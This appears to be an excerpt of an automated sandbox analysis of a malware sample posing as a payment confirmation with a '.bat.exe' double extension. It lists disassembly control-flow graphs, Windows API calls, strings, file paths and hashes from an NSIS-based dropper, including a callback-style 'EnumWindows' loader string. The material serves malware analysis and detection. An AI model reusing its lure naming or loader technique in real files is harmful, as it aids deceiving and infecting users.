                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\eftermodnendes\ringeagt$Call$Control Panel\Desktop\ResourceLocale$H/B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 1975747703-2689128310
                                                            • Opcode ID: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                            • Instruction ID: 33830a549d8bd1c9ff3d4095a28b7d5feb3a0022977f60bfd4e6bbc11b1c7dcb
                                                            • Opcode Fuzzy Hash: 1dbc0aa764a7a3bc96806bc1c5cdbb5ab10d7d6512463466f43f37ee2b0e4de0
                                                            • Instruction Fuzzy Hash: 4661D570200741BAD620AB669E46F2B3A7CEB84709F41453FFA45B61E2DF795902CB2D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 225 4030d5-403123 GetTickCount GetModuleFileNameW call 406172 228 403125-40312a 225->228 229 40312f-40315d call 406682 call 405f9d call 406682 GetFileSize 225->229 230 40336f-403373 228->230 237 403163 229->237 238 403248-403256 call 403033 229->238 240 403168-40317f 237->240 244 403327-40332c 238->244 245 40325c-40325f 238->245 242 403181 240->242 243 403183-40318c call 4035e7 240->243 242->243 251 403192-403199 243->251 252 4032e3-4032eb call 403033 243->252 244->230 247 403261-403279 call 4035fd call 4035e7 245->247 248 40328b-4032d7 GlobalAlloc call 406bd1 call 4061a1 CreateFileW 245->248 247->244 271 40327f-403285 247->271 276 4032d9-4032de 248->276 277 4032ed-40331d call 4035fd call 403376 248->277 256 403215-403219 251->256 257 40319b-4031af call 40612d 251->257 252->244 261 403223-403229 256->261 262 40321b-403222 call 403033 256->262 257->261 274 4031b1-4031b8 257->274 267 403238-403240 261->267 268 40322b-403235 call 406b63 261->268 262->261 267->240 275 403246 267->275 268->267 271->244 271->248 274->261 280 4031ba-4031c1 274->280 275->238 276->230 286 403322-403325 277->286 280->261 282 4031c3-4031ca 280->282 282->261 283 4031cc-4031d3 282->283 283->261 285 4031d5-4031f5 283->285 285->244 287 4031fb-4031ff 285->287 286->244 288 40332e-40333f 286->288 289 403201-403205 287->289 290 403207-40320f 287->290 291 403341 288->291 292 403347-40334c 288->292 289->275 289->290 290->261 293 403211-403213 290->293 291->292 294 40334d-403353 292->294 293->261 294->294 295 403355-40336d call 40612d 294->295 295->230
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 004030E9
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,00000400), ref: 00403105
                                                              • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 00406176
                                                              • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406198
                                                            • GetFileSize.KERNEL32(00000000,00000000,inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe,80000000,00000003), ref: 0040314E
                                                            • GlobalAlloc.KERNELBASE(00000040,00008001), ref: 00403290
                                                            Strings
                                                            • Null, xrefs: 004031CC
                                                            • C:\Users\user\Desktop, xrefs: 00403130, 00403135, 0040313B
                                                            • soft, xrefs: 004031C3
                                                            • Error launching installer, xrefs: 00403125
                                                            • Inst, xrefs: 004031BA
                                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D9
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004030DF, 004032A8
                                                            • inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, xrefs: 00403142
                                                            • "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe", xrefs: 004030DE
                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403327
                                                            • C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, xrefs: 004030EF, 004030FE, 00403112, 0040312F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe$soft
                                                            • API String ID: 2803837635-1681625531
                                                            • Opcode ID: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                            • Instruction ID: fa10dec2ede943269712b0c7dd26c00cc534fb31fc6fa5581d899c5550bae655
                                                            • Opcode Fuzzy Hash: e25ddccf2931d554cf8ae4c0c3bfc4e86d8fe1291d5fc5cd744d09a7651939d3
                                                            • Instruction Fuzzy Hash: 0171B071E00204ABDB20DFA4ED86B9E7AACAB04316F60457FF515B62D1CB7C9E418B5C

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 298 4066bf-4066c8 299 4066ca-4066d9 298->299 300 4066db-4066f5 298->300 299->300 301 406905-40690b 300->301 302 4066fb-406707 300->302 304 406911-40691e 301->304 305 406719-406726 301->305 302->301 303 40670d-406714 302->303 303->301 307 406920-406925 call 406682 304->307 308 40692a-40692d 304->308 305->304 306 40672c-406735 305->306 309 4068f2 306->309 310 40673b-40677e 306->310 307->308 312 406900-406903 309->312 313 4068f4-4068fe 309->313 314 406784-406790 310->314 315 406896-40689a 310->315 312->301 313->301 316 406792 314->316 317 40679a-40679c 314->317 318 40689c-4068a3 315->318 319 4068ce-4068d2 315->319 316->317 324 4067d6-4067d9 317->324 325 40679e-4067c4 call 406550 317->325 322 4068b3-4068bf call 406682 318->322 323 4068a5-4068b1 call 4065c9 318->323 320 4068e2-4068f0 lstrlenW 319->320 321 4068d4-4068dd call 4066bf 319->321 320->301 321->320 337 4068c4-4068ca 322->337 323->337 326 4067db-4067e7 GetSystemDirectoryW 324->326 327 4067ec-4067ef 324->327 340 40687e-406881 325->340 342 4067ca-4067d1 call 4066bf 325->342 332 406879-40687c 326->332 333 406801-406805 327->333 334 4067f1-4067fd GetWindowsDirectoryW 327->334 339 40688e-406894 call 406930 332->339 332->340 333->332 341 406807-406825 333->341 334->333 337->320 338 4068cc 337->338 338->339 339->320 340->339 343 406883-406889 lstrcatW 340->343 345 406827-40682d 341->345 346 406839-406851 call 406a76 341->346 342->332 343->339 351 406835-406837 345->351 355 406853-406866 SHGetPathFromIDListW CoTaskMemFree 346->355 356 406868-406871 346->356 351->346 353 406873-406877 351->353 353->332 355->353 355->356 356->341 356->353
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067E1
                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004067F7
                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406855
                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040685E
                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 00406889
                                                            • lstrlenW.KERNEL32(Call,00000000,00421F28,?,?,00000000,00000000,00000000,00000000), ref: 004068E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
                                                            • API String ID: 4024019347-3319343437
                                                            • Opcode ID: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                            • Instruction ID: 4a93dbd931fcfc477af1f24740db1e2af50c51fdf4929e220b088375b48f32a9
                                                            • Opcode Fuzzy Hash: 6f2761d7cb5587a470c052371fa5fb6b0836c691dcd2ac77b9ed8a87730eab65
                                                            • Instruction Fuzzy Hash: 586147B26053005BEB206F25DD80B6B77E8AB54318F26453FF587B22D0DB3C8961875E

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 421 401774-401799 call 402dab call 405fc8 426 4017a3-4017b5 call 406682 call 405f51 lstrcatW 421->426 427 40179b-4017a1 call 406682 421->427 433 4017ba-4017bb call 406930 426->433 427->433 436 4017c0-4017c4 433->436 437 4017c6-4017d0 call 4069df 436->437 438 4017f7-4017fa 436->438 445 4017e2-4017f4 437->445 446 4017d2-4017e0 CompareFileTime 437->446 440 401802-40181e call 406172 438->440 441 4017fc-4017fd call 40614d 438->441 448 401820-401823 440->448 449 401892-4018bb call 405707 call 403376 440->449 441->440 445->438 446->445 450 401874-40187e call 405707 448->450 451 401825-401863 call 406682 * 2 call 4066bf call 406682 call 405ce2 448->451 463 4018c3-4018cf SetFileTime 449->463 464 4018bd-4018c1 449->464 461 401887-40188d 450->461 451->436 485 401869-40186a 451->485 465 402c38 461->465 467 4018d5-4018e0 CloseHandle 463->467 464->463 464->467 468 402c3a-402c3e 465->468 470 4018e6-4018e9 467->470 471 402c2f-402c32 467->471 473 4018eb-4018fc call 4066bf lstrcatW 470->473 474 4018fe-401901 call 4066bf 470->474 471->465 478 401906-40239d 473->478 474->478 483 4023a2-4023a7 478->483 484 40239d call 405ce2 478->484 483->468 484->483 485->461 486 40186c-40186d 485->486 486->450
                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017B5
                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet,?,?,00000031), ref: 004017DA
                                                              • Part of subcall function 00406682: lstrcpynW.KERNEL32(?,?,00000400,004037B7,00428A60,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040668F
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsa1392.tmp$C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll$C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet$Call
                                                            • API String ID: 1941528284-1096927483
                                                            • Opcode ID: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                            • Instruction ID: 8b6fd23670850fd9ae356807d0398338211ecbfbdba6d544e24b7f39de498ea1
                                                            • Opcode Fuzzy Hash: 92a9eda8d8825c9069b007790ea2e2b4818238bc92c10959f2c45e0ca5d33b48
                                                            • Instruction Fuzzy Hash: 7541A331900109FACF11BBB5CD85DAE7A79EF41329B21423FF422B10E1D73D8A91966D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 487 4026f1-40270a call 402d89 490 402710-402717 487->490 491 402c2f-402c32 487->491 492 402719 490->492 493 40271c-40271f 490->493 494 402c38-402c3e 491->494 492->493 496 402883-40288b 493->496 497 402725-402734 call 4065e2 493->497 496->491 497->496 500 40273a 497->500 501 402740-402744 500->501 502 4027d9-4027dc 501->502 503 40274a-402765 ReadFile 501->503 504 4027f4-402804 call 4061f5 502->504 505 4027de-4027e1 502->505 503->496 506 40276b-402770 503->506 504->496 514 402806 504->514 505->504 507 4027e3-4027ee call 406253 505->507 506->496 509 402776-402784 506->509 507->496 507->504 510 40278a-40279c MultiByteToWideChar 509->510 511 40283f-40284b call 4065c9 509->511 510->514 515 40279e-4027a1 510->515 511->494 520 402809-40280c 514->520 518 4027a3-4027ae 515->518 518->520 521 4027b0-4027d5 SetFilePointer MultiByteToWideChar 518->521 520->511 522 40280e-402813 520->522 521->518 525 4027d7 521->525 523 402850-402854 522->523 524 402815-40281a 522->524 527 402871-40287d SetFilePointer 523->527 528 402856-40285a 523->528 524->523 526 40281c-40282f 524->526 525->514 526->496 529 402831-402837 526->529 527->496 530 402862-40286f 528->530 531 40285c-402860 528->531 529->501 532 40283d 529->532 530->496 531->527 531->530 532->496
                                                            APIs
                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                            • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                              • Part of subcall function 00406253: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406269
                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                            • String ID: 9
                                                            • API String ID: 163830602-2366072709
                                                            • Opcode ID: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                            • Instruction ID: 4accc3969fe2a7d0a9ccf1f8c11f2542f9fe60139f427c4dffc821b6e73cd172
                                                            • Opcode Fuzzy Hash: 92e9fc4a2bdedd92fae86453cef36d5fd9ef34bcac34679d19d253eb0147ccd2
                                                            • Instruction Fuzzy Hash: F3510B75D0011AABDF24AF94CA84AAEBB79FF04344F10817BE901B62D0D7B49D828B58

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 533 406a06-406a26 GetSystemDirectoryW 534 406a28 533->534 535 406a2a-406a2c 533->535 534->535 536 406a3d-406a3f 535->536 537 406a2e-406a37 535->537 539 406a40-406a73 wsprintfW LoadLibraryExW 536->539 537->536 538 406a39-406a3b 537->538 538->539
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A1D
                                                            • wsprintfW.USER32 ref: 00406A58
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A6C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME
                                                            • API String ID: 2200240437-1106614640
                                                            • Opcode ID: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                            • Instruction ID: 2238e0f1a46f5e25e3951852f43a11dddaa5b7c7f32292af2b6637a080077407
                                                            • Opcode Fuzzy Hash: bea2c3dfad6db3553b24c87bd1a60070de232aee380c5cee9c100d0800ee2260
                                                            • Instruction Fuzzy Hash: DFF0FC30601119A7CB14BB68DD0EFAB375C9B01704F10847AA646F10D0EB789664CF98

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 540 402eae-402ed7 call 4064ef 542 402edc-402ee0 540->542 543 402f91-402f95 542->543 544 402ee6-402eea 542->544 545 402eec-402f0d RegEnumValueW 544->545 546 402f0f-402f22 544->546 545->546 547 402f76-402f84 RegCloseKey 545->547 548 402f4b-402f52 RegEnumKeyW 546->548 547->543 549 402f24-402f26 548->549 550 402f54-402f66 RegCloseKey call 406a76 548->550 549->547 551 402f28-402f3c call 402eae 549->551 556 402f86-402f8c 550->556 557 402f68-402f74 RegDeleteKeyW 550->557 551->550 558 402f3e-402f4a 551->558 556->543 557->543 558->548
                                                            APIs
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseEnum$DeleteValue
                                                            • String ID:
                                                            • API String ID: 1354259210-0
                                                            • Opcode ID: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                            • Instruction ID: 09cb529ade84319239dc5b50ebc61ba38ec7146c59f77be9acf979a475766563
                                                            • Opcode Fuzzy Hash: b11fc5b6ae31e3f7bcdb9db3b4e616a20ad73eae00ded2b204568f86272eb2db
                                                            • Instruction Fuzzy Hash: FD218B7150011ABFDF119F90CE89EEF7B7DEB10388F100076B949B11E0D7B48E54AA68

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 559 6e311817-6e311856 call 6e311bff 563 6e311976-6e311978 559->563 564 6e31185c-6e311860 559->564 565 6e311862-6e311868 call 6e31243e 564->565 566 6e311869-6e311876 call 6e312480 564->566 565->566 571 6e3118a6-6e3118ad 566->571 572 6e311878-6e31187d 566->572 573 6e3118cd-6e3118d1 571->573 574 6e3118af-6e3118cb call 6e312655 call 6e311654 call 6e311312 GlobalFree 571->574 575 6e311898-6e31189b 572->575 576 6e31187f-6e311880 572->576 577 6e3118d3-6e31191c call 6e311666 call 6e312655 573->577 578 6e31191e-6e311924 call 6e312655 573->578 599 6e311925-6e311929 574->599 575->571 579 6e31189d-6e31189e call 6e312e23 575->579 581 6e311882-6e311883 576->581 582 6e311888-6e311889 call 6e312b98 576->582 577->599 578->599 593 6e3118a3 579->593 587 6e311890-6e311896 call 6e312810 581->587 588 6e311885-6e311886 581->588 590 6e31188e 582->590 598 6e3118a5 587->598 588->571 588->582 590->593 593->598 598->571 602 6e311966-6e31196d 599->602 603 6e31192b-6e311939 call 6e312618 599->603 602->563 606 6e31196f-6e311970 GlobalFree 602->606 609 6e311951-6e311958 603->609 610 6e31193b-6e31193e 603->610 606->563 609->602 611 6e31195a-6e311965 call 6e3115dd 609->611 610->609 612 6e311940-6e311948 610->612 611->602 612->609 613 6e31194a-6e31194b FreeLibrary 612->613 613->609
                                                            APIs
                                                              • Part of subcall function 6E311BFF: GlobalFree.KERNEL32(?), ref: 6E311E74
                                                              • Part of subcall function 6E311BFF: GlobalFree.KERNEL32(?), ref: 6E311E79
                                                              • Part of subcall function 6E311BFF: GlobalFree.KERNEL32(?), ref: 6E311E7E
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E3118C5
                                                            • FreeLibrary.KERNEL32(?), ref: 6E31194B
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E311970
                                                              • Part of subcall function 6E31243E: GlobalAlloc.KERNEL32(00000040,?), ref: 6E31246F
                                                              • Part of subcall function 6E312810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E311896,00000000), ref: 6E3128E0
                                                              • Part of subcall function 6E311666: wsprintfW.USER32 ref: 6E311694
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
